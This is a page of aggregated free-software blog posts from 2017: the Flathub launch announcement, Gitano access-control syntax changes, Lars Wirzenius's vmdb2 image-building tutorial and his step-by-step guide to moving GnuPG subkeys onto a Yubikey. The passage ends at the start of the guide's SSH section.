Search Results: "lars"

29 July 2017

Robert McQueen: Welcome, Flathub!

Alex Larsson talks about Flathub at GUADEC 2017

At the Gtk+ hackfest in London earlier this year, we stole an afternoon from the toolkit folks (sorry!) to talk about Flatpak, and how we could establish a critical mass behind the Flatpak format. Bringing Linux container and sandboxing technology together with ostree, we've got a technology which solves real-world distribution, technical and security problems which have arguably held back the Linux desktop space and frustrated ISVs and app developers for nearly 20 years. The problem we need to solve, like any ecosystem, is one of users and developers: without stuff you can easily get in Flatpak format, there won't be many users, and without many users, we won't have a strong or compelling incentive for developers to take their precious time to understand a new format and a new technology.

As Alex Larsson said in his GUADEC talk yesterday: decentralisation is good. Flatpak is a tool that is totally agnostic of who is publishing the software and where it comes from. For software freedom, that's an important thing, because we want technology to empower users rather than tell them what they can or can't do. Unfortunately, decentralisation makes for a terrible user experience. At present, the Flatpak webpage has a manually curated list of links to tens of places where you can find different Flatpaks and add them to your system. You can't easily search and browse to find apps to try out, so it's clear that if the current situation remains, we're not going to be able to get a critical mass of users and developers around Flatpak.

Enter Flathub. The idea is that by creating an obvious center of gravity for the Flatpak community to contribute and build their apps, users will have one place to go and find the best that the Linux app ecosystem has to offer. We can take care of the boring stuff like running a build service, and empower Linux application developers to choose how and when their app gets out to their users. After the London hackfest we sketched out a minimum viable system (GitHub, Buildbot and a few workers) and got it going over the past few months, culminating in a mini-fundraiser to pay for the hosting of a production-ready setup. Thanks to the 20 individuals who supported our fundraiser, to Mythic Beasts who provided a server along with management, monitoring and heaps of bandwidth, and to Codethink and Scaleway who provide our ARM and Intel workers respectively.

We inherit our core principles from the Flatpak project: we want the Flatpak technology to succeed at alleviating the issues faced by app developers in targeting a diverse set of Linux platforms. None of this stops you from building and hosting your own Flatpak repos, and we look forward to this being a wide and open playing field. We care about the success of the Linux desktop as a platform, so we are open to proprietary applications through Flatpak's extra data feature, where the client machine downloads 3rd party binaries. They are correctly labeled as such in the AppStream, so will only be shown if you or your OS has configured GNOME Software to show you apps with proprietary licenses, respecting the user's preference.

The new infrastructure is up and running and I put it into production on Thursday. We rebuilt the whole repository on the new system over the course of the week, signing everything with our new 4096-bit key stored on a Yubikey smartcard USB key.
We have 66 apps at the moment, although Alex is working on bringing in the GNOME apps at present; we hope those will be joined soon by the KDE apps, and Endless is planning to move over as many of our 3rd party Flatpaks as possible over the coming months. So, thanks again to Alex and the whole Flatpak community, and to the individuals and the companies who supported making this a reality. You can add the repository and get downloading right away. Welcome to Flathub! Go forth and flatten...
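If you want to try it, adding the Flathub remote and installing an app looks roughly like this. This is a sketch: the repo file URL is the one advertised on flathub.org (check there for the current one), and org.gnome.Builder is just an example app ID, so substitute whatever you want to install.
flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo
flatpak install flathub org.gnome.Builder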

19 July 2017

Lars Wirzenius: Dropping Yakking from Planet Debian

A couple of people objected to having Yakking on Planet Debian, so I've removed it.

13 July 2017

Lars Wirzenius: Adding Yakking to Planet Debian

In a case of blatant self-promotion, I am going to add the Yakking RSS feed to the Planet Debian aggregation. (But really because I think some of the readership of Planet Debian may be interested in the content.) Yakking is a group blog by a few friends aimed at new free software contributors. From the front page description:
Welcome to Yakking. This is a blog for topics relevant to someone new to free software development. We assume you are already familiar with computers, and are curious about participating in the production of free software. You don't need to be a programmer: software development requires a wide variety of skills, and you can be a valued core contributor to a project without being a programmer.
If anyone objects, please let me know.

8 July 2017

Daniel Silverstone: Gitano - Approaching Release - Access Control Changes

As mentioned previously I am working toward getting Gitano into Stretch. A colleague and friend of mine (Richard Maw) did a large pile of work on Lace to support what we are calling sub-defines. These let us simplify Gitano's ACL files, particularly for individual projects. In this posting, I'd like to cover what has changed with the access control support in Gitano, so if you've never used it then some of this may make little sense. Later on, I'll be looking at some better user documentation in conjunction with another friend of mine (Lars Wirzenius) who has promised to help produce a basic administration manual before Stretch is totally frozen.

Sub-defines

With a more modern Lace (version 1.3 or later) there is a mechanism we are calling 'sub-defines'. Previously, if you wanted to write a ruleset which said something like "Allow Steve to read my repository" you needed:
define is_steve user exact steve
allow "Steve can read my repo" is_steve op_read
And, as you'd expect, if you also wanted to grant read access to Jeff then you'd need yet another set of defines:
define is_jeff user exact jeff
define is_steve user exact steve
define readers anyof is_jeff is_steve
allow "Steve and Jeff can read my repo" readers op_read
This, while flexible (and still entirely acceptable), is wordy for small rulesets, and so we added sub-defines to create this syntax:
allow "Steve and Jeff can read my repo" op_read [anyof [user exact jeff] [user exact steve]]
Of course, this is generally neater for simpler rules, if you wanted to add another user then it might make sense to go for:
define readers anyof [user exact jeff] [user exact steve] [user exact susan]
allow "My friends can read my repo" op_read readers
The nice thing about this sub-define syntax is that it's basically usable anywhere you'd use the name of a previously defined thing; they're compiled in much the same way, and Richard worked hard to get good error messages out of them, just in case.

No more auto_user_XXX and auto_group_YYY

As a result of the above being implemented, the support Gitano previously grew for automatically defining users and groups has been removed. The approach we took was pretty inflexible and risked compilation errors if a user was deleted or renamed, and so the sub-define approach is much, much better. If you currently use auto_user_XXX or auto_group_YYY in your rulesets then your upgrade path isn't bumpless, but it should be fairly simple:
  1. Upgrade your version of lace to 1.3
  2. Replace any auto_user_FOO with [user exact FOO], and similarly any auto_group_BAR with [group exact BAR]; a sed sketch for this follows the list.
  3. You can now upgrade Gitano safely.
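A rough sed sketch of step 2, run against a ruleset file (the file name here is hypothetical; review the result by hand before relying on it):
sed -i -E 's/auto_user_([A-Za-z0-9_-]+)/[user exact \1]/g; s/auto_group_([A-Za-z0-9_-]+)/[group exact \1]/g' project.lace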

No more 'basic' matches

Since Gitano first gained support for ACLs using Lace, we had a mechanism called 'simple match' for basic inputs such as groups, usernames, repo names, ref names, etc. Simple matches looked like user FOO or group !BAR. The match syntax grew more and more arcane as we added Lua pattern support (matches such as refs ~^refs/heads/$ or user /). When we wanted to add proper PCRE regex support we added a syntax of the form user pcre ^/.+?..., where pcre could be any of: exact, prefix, suffix, pattern, or pcre. We had a complex set of rules for exactly what the sigils at the start of the match string might mean and in what order, and it was getting unwieldy. To simplify matters, none of the "backward compatibility" remains in Gitano. You instead MUST use the <what> <how> <match> form. To make this slightly more natural to use, we have added a bunch of aliases: is for exact, starts and startswith for prefix, and ends and endswith for suffix. In addition, the kind of match can be prefixed with a ! to invert it, and for natural-looking rules not is an alias for !is. This means that your rulesets MUST be updated to use the more explicit syntax before you update Gitano, or else nothing will compile. Fortunately this form has been supported for a long time, so you can do this in three steps.
  1. Update your gitano-admin.git global ruleset. For example, the old form of the defines used to contain define is_gitano_ref ref ~^refs/gitano/ which can trivially be replaced with: define is_gitano_ref ref prefix refs/gitano/
  2. Update any non-zero rulesets your projects might have.
  3. You can now safely update Gitano
If you want a reference for making those changes, you can look at the Gitano skeleton ruleset which can be found at https://git.gitano.org.uk/gitano.git/tree/skel/gitano-admin/rules/ or in /usr/share/gitano if Gitano is installed on your local system. Next time, I'll likely talk about the deprecated commands which are no longer in Gitano, and how you'll need to adjust your automation to use the new commands.

2 July 2017

Bits from Debian: New Debian Developers and Maintainers (May and June 2017)

The following contributors got their Debian Developer accounts in the last two months: The following contributors were added as Debian Maintainers in the last two months: Congratulations!

25 June 2017

Lars Wirzenius: Obnam 1.22 released (backup application)

I've just released version 1.22 of Obnam, my backup application. It is the first release for this year. Packages are available on code.liw.fi/debian and in Debian unstable, and source is in git. A summary of the user-visible changes is below. For those interested in living dangerously and accidentally on purpose deleting all their data, the link below shows the status and roadmap for FORMAT GREEN ALBATROSS: http://distix.obnam.org/obnam-dev/182bd772889544d5867e1a0ce4e76652.html

Version 1.22, released 2017-06-25

4 June 2017

Lars Wirzenius: Vmdb2 first alpha release: Debian disk image creation tool

tl;dr: Get the vmdebootstrap replacement from http://git.liw.fi/vmdb2 and run it from the source tree. Tell me if something doesn't work. Send patches.

Many years ago I wrote vmdebootstrap, a tool for installing Debian on a disk image for virtual machines. I had a clear personal need: I was setting up a CI system and it needed six workers: one each for Debian oldstable, stable, and unstable, on two architectures (i386, amd64). Installing Debian six times in the same way is a lot of work, so I figured: how difficult can it be to automate? Turns out not difficult at all, except for installing a bootloader. (Don't ask me why I didn't use any of the other tools for this. It was long ago, and while some of the tools that now exist probably did exist then, I like writing code and learning things while doing it.)

After a while I was happy with what the program did, but didn't want to upload it to Debian, and didn't want to add the kinds of things other people wanted, so I turned vmdebootstrap over to Neil Williams, who added a ton of new features. Unfortunately, it turned out that my initial architecture was not scalable, and also the code I wrote wasn't very good, and there weren't any tests. Neil did heroic work forcing my crappy software into doing things I never envisioned. Last year he needed a break and asked me to take vmdebootstrap back. I did, and have been hiding from the public eye ever since, since I was so ashamed of the code. (I created a new identity and pretended to be an international assassin and backup specialist, travelling the world forcing people to have at least one tested backup of their system. If you've noticed reports in the press about people reporting near-death experiences while holding a shiny new USB drive, that would've been my fault.)

Pop quiz: if you have a program with ten boolean options ("do this, except if that option is given, do the other thing"), how many black box tests do you need to test all the functionality? If one run of the program takes half an hour, how long will a full test suite run?

I did some hard thinking about vmdebootstrap, and came to the sad conclusion that it had reached the end of its useful life as a living software project. There was no reasonable way to add most of the additional functionality people were asking for, and even maintaining the current code was too tedious a task to consider seriously. It was time to make a clean break with the past and start over, without caring about backwards compatibility. After all, the old code wasn't going anywhere, so anyone who needed it could still use it. There was no need to burden a new program with my past mistakes. All new mistakes were called for.

At the Cambridge mini-Debconf of November 2016, I gave a short presentation of what I was going to do. I also posted about my plans to the debian-cloud list. In short, I would write a new, more flexible and cleaner replacement to be called vmdb2. For various personal reasons, I've not been able to spend as much time on vmdb2 as I'd like to, but I've now reached the point where I'd like to announce the first alpha version publicly. The source code is hosted here: http://git.liw.fi/vmdb2 . There are .deb packages at my personal public APT repo (http://liw.fi/code/), but vmdb2 is easy enough to run directly from a git checkout:
sudo ./vmdb2 foo.vmdb --output foo.img
There's no need to install it to try it. What works: What doesn't work: I'm not opposed to adding support for those, but they're not directly interesting to me. For example, I only have amd64 machines. The best way to get support for additional features is to tell me how, preferably in the form of patches. (If I have to read tons of docs, or other people's code, and then write code and iterate while other people tell me it doesn't work, it's probably not happening.) Why would you be interested in vmdb2? There's a lot of other tools to do what it does, so perhaps you shouldn't care. That's fine. I like writing tools for myself. But if this kind of tool is of interest to you, please do have a look. A short tutorial: vmdb2 wants you to give it a "specification file" (conventionally suffixed .vmdb, because someone stole the .spec suffix, but vmdb2 doesn't care about the name). Below is an example. vmdb2 image specification files are in YAML, since I like YAML, and specify a sequence of steps to take to build the image. Each step is a tiny piece of self-contained functionality provided by a plugin.
steps:
  - mkimg: "{{ output }}"
    size: 4G
  - mklabel: msdos
    device: "{{ output }}"
  - mkpart: primary
    device: "{{ output }}"
    start: 0%
    end: 100%
    part-tag: root-part
The above creates an image (the name is specified with the --output option), four gigabytes in size, and creates a partition table and a single partition that fills the whole disk. The "tag" is given so that later steps can easily refer to the partition. If you prefer another way to partition the disk, you can achieve that by adding more "mkpart" steps. For example, for UEFI you'll want to have an EFI partition.
  - mkfs: ext4
    partition: root-part
  - mount: root-part
    fs-tag: root-fs
The above formats the partition with the ext4 filesystem, and then mounts it. The mount point will be a temporary directory created by vmdb2, and a tag is again given to the mount point so it can be referred to.
  - unpack-rootfs: root-fs
The above unpacks a tar archive to put content into the filesystem, if the tar archive exists. The tar archive is specified with the --rootfs-tarball command line option.
  - debootstrap: stretch
    mirror: http://http.debian.net/debian
    target: root-fs
    unless: rootfs_unpacked
  - apt: linux-image-amd64
    fs-tag: root-fs
    unless: rootfs_unpacked
  - cache-rootfs: root-fs
    unless: rootfs_unpacked
The above will run debootstrap and install a kernel into the filesystem, but skip doing that if the rootfs tarball was used. Also, the tarball is created if it didn't exist. This way the tarball is used by all but the first run, which saves a bit of time. On my laptop and with a local mirror, debootstrap and kernel installation takes on the order of nine minutes (500 to 600 seconds), whereas unpacking the tar archive is a bit faster (takes around 30 seconds). When iterating over things other than debootstrap, this speeds things up something wonderful, and seems worth the complexity. The "unless:" mechanism is generic. All the steps share some state, and the unpack-rootfs step sets the "rootfs_unpacked" flag in the shared state. The "unless:" field tells vmdb2 to check for the flag and if it is not set, or if it is set to false ("unless it is set to true"), vmdb2 will execute the step. vmdb2 may get more such flags in the future, if there's need.
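For example, a build that reuses the cached root filesystem might be invoked like this (a sketch: foo.tar.gz is a hypothetical path for the cache tarball, created on the first run and reused afterwards):
sudo ./vmdb2 foo.vmdb --output foo.img --rootfs-tarball foo.tar.gz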
  - chroot: root-fs
    shell: |
      sed -i '/^root:[^:]*:/s//root::/' /etc/passwd
      echo pc-vmdb2 > /etc/hostname
The above executes a couple of shell commands in a chroot of the root filesystem we've just created. In this case they remove the login password from root, and set the hostname. This is a replacement for the vmdebootstrap "customize" script, but it can be inserted anywhere into the sequence of steps. There are both chroot and non-chroot variants of the step. This is a good point to mention that writing customize scripts gets quite repetitive and tedious after a while, so vmdb2 has a plugin to run Ansible instead. You can customize your image with that while the image is being built, and not have to wait until you boot the image and run Ansible over ssh.
  - grub: bios
    root-fs: root-fs
    root-part: root-part
    device: "{{ output }}"
    console: serial
Finally, install a boot loader, grub. This shows the BIOS variant, UEFI is also supported. This also configures grub and the kernel to use a serial console. There's a "yarn" (test suite) to build and smoke test an image with vmdb2 to make sure at least the basic functionality works. The smoke test boots the image under Qemu, logs in as root, and tells the VM to power off. Very, very basic, but has already found actual bugs in vmdb2. The smoke test needs the serial console to work. As with vmdebootstrap originally, I don't particularly want to maintain the package in Debian. I've added Debian packaging (so that I can install it on my own machines), but I already have enough packages to maintain, so I'm hoping someone else will volunteer to take on the Debian maintainership and bug handling duties. If you would like vmdb2 to do more things to suit you better, I'm happy to explain how to write plugins to provide more types of steps. If you are currently using vmdebootstrap, either directly or as part of another tool, I encourage you to have a look at vmdb2. In the long term, I would like to retire vmdebootstrap entirely, once vmdb2 can do everything vmdebootstrap can do, and few people use vmdebootstrap. This may take a while. In any case, whether you want a new image building tool or not, happy hacking.

31 May 2017

Lars Wirzenius: Using a Yubikey 4 for ensafening one's encryption

Introduction

I've written before about using a U2F key with PAM. This post continues the theme and explains how to use a smartcard with GnuPG for storing OpenPGP private keys. Specifically, a Yubikey 4 card, because that's what I have, but any good GnuPG compatible card should work. The Yubikey is both a GnuPG compatible smart card and a U2F card. The Yubikey 4 can handle keys up to 4096 bits; older Yubikeys can only handle keys up to 2048 bits. The reason to do this is to make it harder for an attacker to steal your encryption keys. I will assume you don't already have an OpenPGP key, or are willing to generate a new one. I will also assume you run Debian stretch; some of the desktop environment setup details may differ between Debian versions or between Linux distributions. You will need:

Terminology

Some terminology:

Outline

The process outline is:
  1. Create a new, signing-only master key with GnuPG.
  2. Create three "subkeys", one each for encryption, signing, and authentication. These subkeys are what everyone else uses.
  3. Export copies of the master key pair and the subkey pairs and put them in a safe place.
  4. Put the subkeys on the Yubikey.
  5. GnuPG will automatically use the keys from the card. You have to have the card plugged into a USB port for things to work. If someone steals your laptop, they won't get the private subkeys. Even if they steal your Yubikey, they won't get them (the smartcard is physically designed to prevent that), and can't even use them (because there's PIN codes or passphrases and getting them wrong several times locks up the smartcard).
  6. Use gpg-agent as your SSH agent, and the authentication-only subkey on the Yubikey is used as your ssh key.
Configure GnuPG

The process in more detail:

Create new keys
$ gpg --full-generate-key
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
Your selection? 4
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:43:54 PM EEST
Is this correct? (y/N) y

GnuPG needs to construct a user ID to identify your key.

Real name: Lars Wirzenius
Email address: liw@liw.fi
Comment: test key
You selected this USER-ID:
"Lars Wirzenius (test key) <liw@liw.fi>>"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: key 25FB738D6EE435F7 marked as ultimately trusted
gpg: directory '/home/liw/.gnupg/openpgp-revocs.d' created
gpg: revocation certificate stored as '/home/liw/.gnupg/openpgp-revocs.d/A734C10BF2DF39D19DC0F6C025FB738D6EE435F7.rev'
public and secret key created and signed.

Note that this key cannot be used for encryption. You may want to use
the command "--edit-key" to generate a subkey for this purpose.
pub rsa4096 2017-05-29 [SC] [expires: 2018-05-29]
A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
uid Lars Wirzenius (test key) <liw@liw.fi>
  • Note that I set a 1-year expiration for they key. The expiration can be extended at any time (if you have the master secret key), but unless you do, the key won't accidentally live longer than the chosen time.
  • Review the key:
$ gpg --list-secret-keys
/home/liw/.gnupg/pubring.kbx
----------------------------
sec rsa4096 2017-05-29 [SC] [expires: 2018-05-29]
A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
uid [ultimate] Lars Wirzenius (test key) <liw@liw.fi>
  • You now have the signing-only master key. You should now create three subkeys (keyid is the key identifier shown in the key listing, A734C10BF2DF39D19DC0F6C025FB738D6EE435F7 above). Use the --expert option to be able to add an authentication-only subkey.
$ gpg --edit-key --expert A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> addkey
Please select what kind of key you want:
(3) DSA (sign only)
(4) RSA (sign only)
(5) Elgamal (encrypt only)
(6) RSA (encrypt only)
(7) DSA (set your own capabilities)
(8) RSA (set your own capabilities)
(10) ECC (sign only)
(11) ECC (set your own capabilities)
(12) ECC (encrypt only)
(13) Existing key
Your selection? 4
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:44:52 PM EEST
Is this correct? (y/N) y
Really create? (y/N) y
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> addkey
Please select what kind of key you want:
(3) DSA (sign only)
(4) RSA (sign only)
(5) Elgamal (encrypt only)
(6) RSA (encrypt only)
(7) DSA (set your own capabilities)
(8) RSA (set your own capabilities)
(10) ECC (sign only)
(11) ECC (set your own capabilities)
(12) ECC (encrypt only)
(13) Existing key
Your selection? 6
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:45:22 PM EEST
Is this correct? (y/N) y
Really create? (y/N) y
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> addkey
Please select what kind of key you want:
(3) DSA (sign only)
(4) RSA (sign only)
(5) Elgamal (encrypt only)
(6) RSA (encrypt only)
(7) DSA (set your own capabilities)
(8) RSA (set your own capabilities)
(10) ECC (sign only)
(11) ECC (set your own capabilities)
(12) ECC (encrypt only)
(13) Existing key
Your selection? 8

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Sign Encrypt

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? a

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Sign Encrypt Authenticate

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? s

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Encrypt Authenticate

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? e

Possible actions for a RSA key: Sign Encrypt Authenticate
Current allowed actions: Authenticate

(S) Toggle the sign capability
(E) Toggle the encrypt capability
(A) Toggle the authenticate capability
(Q) Finished

Your selection? q
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 1y
Key expires at Tue 29 May 2018 06:45:56 PM EEST
Is this correct? (y/N) y
Really create? (y/N) y
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.

sec rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> save
Export secret keys to files, make a backup
  • You now have a master key and three subkeys. They are hidden in the ~/.gnupg directory. It is time to "export" the secret keys out from there.
$ gpg --export-secret-key --armor keyid > master.key
$ gpg --export-secret-subkeys --armor keyid > subkeys.key
  • You should keep these files safe. You don't want to lose them, and you don't want anyone else to get access to them. I recommend you get two USB memory sticks, format them using full-disk encryption, and copy the exported files to both of them. Then keep them somewhere safe. There are ways of making this part more sophisticated, but that's for another time.
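One way to do that, as a sketch (this assumes the stick shows up as /dev/sdX and will completely wipe it; the mapper name and mount point are arbitrary):
$ sudo cryptsetup luksFormat /dev/sdX
$ sudo cryptsetup open /dev/sdX keybackup
$ sudo mkfs.ext4 /dev/mapper/keybackup
$ sudo mount /dev/mapper/keybackup /mnt
$ sudo cp master.key subkeys.key /mnt/
$ sudo umount /mnt
$ sudo cryptsetup close keybackup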
  • The next step involves some hoop-jumping. What we want is to have the master secret key NOT on your machine, so we tell GnuPG to remove it. We exported it above, so we won't lose it. However, deleting the master secret key also removes the secret subkeys. But we can import those without importing the master secret key.
$ gpg --delete-secret-key keyid
$ gpg --import subkeys.key
  • Now verify that you have the secret subkeys, but not the master key. There should be one line starting with sec# (note the hash mark, which indicates the key isn't available), and three lines starting with ssb (no hash mark).
$ gpg -K
/home/liw/.gnupg/pubring.kbx
----------------------------
sec# rsa4096 2017-05-29 [SC] [expires: 2018-05-29]
A734C10BF2DF39D19DC0F6C025FB738D6EE435F7
uid [ultimate] Lars Wirzenius (test key) <liw@liw.fi>
ssb rsa4096 2017-05-29 [S] [expires: 2018-05-29]
ssb rsa4096 2017-05-29 [E] [expires: 2018-05-29]
ssb rsa4096 2017-05-29 [A] [expires: 2018-05-29]
Install subkeys on a Yubikey
  • Now insert the Yubikey in a USB slot. We can start transferring the secret subkeys to the Yubikey. If you want, you can set your name and other information, and change PIN codes. There are several types of PIN codes: one for normal use, one for unblocking a locked card, and a third for admin operations. Changing the PIN codes is a good idea, otherwise everyone will just try the default of 123456 (admin 12345678). However, I'm skipping that in the interest of brevity.
$ gpg --card-edit
...
  • Actually move the subkeys to the card. Note that this does a move, not a copy, and the subkeys will be removed from your ~/.gnupg (check with gpg -K).
$ gpg --edit-key liw
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 1

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb* rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> keytocard
Please select where to store the key:
(1) Signature key
(3) Authentication key
Your selection? 1

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb* rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 1

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 2

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb* rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> keytocard
Please select where to store the key:
(2) Encryption key
Your selection? 2

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb* rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 2

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> key 3

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb* rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> keytocard
Please select where to store the key:
(3) Authentication key
Your selection? 3

pub rsa4096/25FB738D6EE435F7
created: 2017-05-29 expires: 2018-05-29 usage: SC
trust: ultimate validity: ultimate
ssb rsa4096/05F88308DFB71774
created: 2017-05-29 expires: 2018-05-29 usage: S
ssb rsa4096/2929E8A96CBA57C7
created: 2017-05-29 expires: 2018-05-29 usage: E
ssb* rsa4096/4477EB0AEF1C440A
created: 2017-05-29 expires: 2018-05-29 usage: A
[ultimate] (1). Lars Wirzenius (test key) <liw@liw.fi>

gpg> save
  • If you want to use several Yubikeys, or have a spare one just in case, repeat the previous four steps (starting from importing subkeys back into ~/.gnupg).
  • You're now done, as far as GnuPG use is concerned. Any time you need to sign, encrypt, or decrypt something, GnuPG will look for your subkeys on the Yubikey, and will tell you to insert it in a USB port if it can't find the key.
Use subkey on Yubikey as your SSH key
